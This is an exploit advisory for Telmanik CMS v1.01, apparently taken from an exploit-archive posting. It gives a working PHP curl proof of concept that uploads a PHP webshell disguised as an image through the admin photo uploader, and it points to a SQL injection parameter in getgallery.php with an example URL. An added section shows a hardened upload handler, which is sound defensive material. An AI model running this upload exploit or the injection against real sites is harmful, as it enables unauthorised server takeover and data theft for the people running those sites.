Telmanik CMS v1.01 Multiple Vulnerabilities (admin folder)

2013-12-12 21:23:34
Submitted by: JoKeR_StEx


1) File Upload

P.O.C

<?

# <3Algeria<3

$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";
$dz = curl_init();
$shell = "jxdz.jpg.php";
curl_setopt($dz,CURLOPT_URL,$web);
curl_setopt($dz,CURLOPT_RETURNTRANSFER,true);
curl_setopt($dz,CURLOPT_HEADER,false);
curl_setopt($dz,CURLOPT_VERBOSE,false);
curl_setopt($dz,CURLOPT_POST,true);
$jxarray = array("image1"=>"@".$shell);
curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);
$exec=curl_exec($dz);
$end=curl_close($dz);

?>

The uploaded shell can then be found in /photos/
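
A hardened form of the upload step that the PoC above abuses, given as an added example; it is not code from Telmanik CMS or from the advisory's author. It assumes PHP 7 or later, keeps the form field name image1 from the PoC, and uses a hypothetical session key (admin_id) and a constructed path and size limit.

```php
<?php
// Added example, not Telmanik's code. Assumptions: PHP 7+, field "image1" (from the PoC).
const MAX_PHOTO_BYTES = 2 * 1024 * 1024;        // constructed limit
const PHOTO_DIR = __DIR__ . '/../photos';       // assumed location of /photos/
const ALLOWED_TYPES = [                         // detected MIME type => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function store_uploaded_photo(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_PHOTO_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Decide the type from the file content, never from the client-supplied
    // name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = ALLOWED_TYPES[(string) $mime] ?? null;
    if ($ext === null || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image');
    }

    // Discard the client name entirely: "jxdz.jpg.php" is stored as "<random>.jpg",
    // so no attacker-chosen extension ever reaches the photos directory.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Handler body: refuse requests without an authenticated admin session.
// $_SESSION['admin_id'] is a hypothetical marker set by the login code.
session_start();
if (empty($_SESSION['admin_id'])) {
    http_response_code(403);
    exit;
}
try {
    echo store_uploaded_photo($_FILES['image1'] ?? [], PHOTO_DIR);
} catch (RuntimeException $e) {
    http_response_code(400);
}
```

Independently of the handler, the web server should be configured so that nothing under the photos directory is passed to the PHP interpreter.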

2) SQL Injection (getgallery.php)

The bug is in: getgallery.php

Lines: 35...39

The code:
/*
if (isset($_GET['gallery'])) {
$colname_photos = $_GET['gallery'];
}
mysql_select_db($database_telmanik_press, $telmanik_press);
$query_photos = sprintf("SELECT * FROM photos WHERE gallery = %s", GetSQLValueString($colname_photos, "text"));
$photos = mysql_query($query_photos, $telmanik_press) or die(mysql_error());
$row_photos = mysql_fetch_assoc($photos);
$totalRows_photos = mysql_num_rows($photos);


*/

Example:

http://127.0.0.1/telmanik/upload/admin/getgallery.php?gallery=[Inject here]

###################################
The Black Devils , Team Dz S.O.S !/
###################################

Fixes

No fixes
